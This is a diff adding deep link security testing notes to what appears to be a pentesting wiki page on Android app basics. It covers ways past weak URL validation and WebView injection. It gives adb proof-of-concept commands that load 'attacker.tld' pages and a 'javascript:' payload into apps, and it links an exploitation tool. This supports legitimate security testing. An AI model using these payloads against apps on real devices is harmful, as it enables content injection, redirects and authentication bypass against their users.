diff --git a/src/mobile-pentesting/android-app-pentesting/android-applications-basics.md b/src/mobile-pentesting/android-app-pentesting/android-applications-basics.md
index 4c0088026c8..9eef2d459cd 100644
--- a/src/mobile-pentesting/android-app-pentesting/android-applications-basics.md
+++ b/src/mobile-pentesting/android-app-pentesting/android-applications-basics.md
@@ -231,6 +231,31 @@ In order to find the **code that will be executed in the App**, go to the activi
Learn how to [call deep links without using HTML pages](#exploiting-schemes-deep-links).
+### Deep link security testing & adb PoCs
+
+- **Entry point discovery**: exported Activities that declare **`` + ``** are remotely reachable via crafted URIs (custom schemes or `http/https` App Links). Prioritise paths containing **login/reset/payment/wallet/admin** keywords.
+- **Validation bypass heuristics**: weak host checks such as `endsWith()`, `contains()`, permissive regexes, or substring allowlists can usually be bypassed with attacker-controlled subdomains, prefix/suffix tricks, and URL/UTF‑8 double-encoding.
+- **WebView sinks**: if the handler forwards the incoming URI or query params to `WebView.loadUrl(...)`, you can coerce the app to render arbitrary attacker content. If scheme validation is weak, try **`javascript:`** payloads as well as external `https://` URLs.
+- **adb PoC templates** (implicit vs explicit):
+
+```bash
+# Generic implicit VIEW (custom scheme or App Link)
+adb shell am start -a android.intent.action.VIEW \
+ -d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"
+
+# Explicitly target a specific Activity
+adb shell am start -n com.example/.MainActivity -a android.intent.action.VIEW \
+ -d "myapp://host/path?redirect=https://attacker.tld"
+
+# Try javascript: when scheme filters are lax
+adb shell am start -a android.intent.action.VIEW \
+ -d "myapp://host/web?url=javascript:alert(1)"
+```
+
+- **Operational tips**: capture multiple payload variants (external URL vs `javascript:`) and replay them quickly against a device/emulator to distinguish real issues (open-redirect/auth-bypass/WebView URL injection) from static-analysis noise.
+- **Automation**: [Deep-C](https://github.com/KishorBal/deep-C) automates deeplink hunting by decompiling the APK (apktool + dex2jar + jadx), enumerating **exported + browsable** activities, correlating weak validation and `WebView.loadUrl` flows, and emitting ready-to-run adb PoCs (optionally auto-executed with `--exec`).
+
+
## AIDL - Android Interface Definition Language
The **Android Interface Definition Language (AIDL)** is designed for facilitating communication between client and service in Android applications through **interprocess communication** (IPC). Since accessing another process's memory directly is not permitted on Android, AIDL simplifies the process by marshalling objects into a format understood by the operating system, thereby easing communication across different processes.
@@ -511,6 +536,7 @@ Tools / scripts that speed-up Binder reconnaissance:
- [Android manifest provider: readPermission](https://developer.android.com/guide/topics/manifest/provider-element#rprmsn)
- [Android manifest provider: writePermission](https://developer.android.com/guide/topics/manifest/provider-element#wprmsn)
- [Android ContentResolver.update()](https://developer.android.com/reference/android/content/ContentResolver#update(android.net.Uri,%20android.content.ContentValues,%20java.lang.String,%20java.lang.String[]))
+- [Deep-C – Android deep link exploitation framework](https://github.com/KishorBal/deep-C)
{{#include ../../banners/hacktricks-training.md}}